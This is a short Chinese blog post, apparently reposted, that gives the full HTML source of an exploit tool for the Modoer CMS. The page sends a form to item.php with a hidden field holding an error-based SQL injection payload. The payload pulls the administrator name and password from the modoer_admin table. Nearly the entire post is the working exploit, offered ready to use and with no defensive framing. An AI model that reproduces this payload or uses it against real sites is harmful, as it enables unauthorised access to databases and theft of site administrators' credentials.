Modoer Exp
源码:
<html> <head> <title> Modoer EXP </title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <script language="javascript"> function expstart() { var url = document.forms[0].url.value; if(url != ""){ if(url.search("http://") < 0 && url.search("https://") < 0){ url = "http://" + url; } document.submit_url.action = url + "/item.php?act=ajax&op=get_membereffect&do=subject"; }else{ alert("Hello Hacker!!!"); } } </script> <body> <h2>声明:本漏洞是t00ls -- <span style="color: #ff0000;"><h1>Rices</h1></span> 大牛挖的!本菜自己需要用就写了一个!!</h2> <h2>Modoer EXP </h2> <form action="" method="post" name="submit_url"> <span style="color: #ff0000;">url: </span> <input type="text" name="url" value="http://" size="40"> <input type="hidden" name="effect" value="(select 1 from(select count(*),concat((select (select (SELECT concat(adminname,0x7c,password) FROM modoer_admin limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #"> <input type="hidden" name="sid" value="1"> <input type="hidden" name="member" value="1"> <input type="submit" value="exp" onclick="expstart();"> </form> <body> </html>
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/4040.html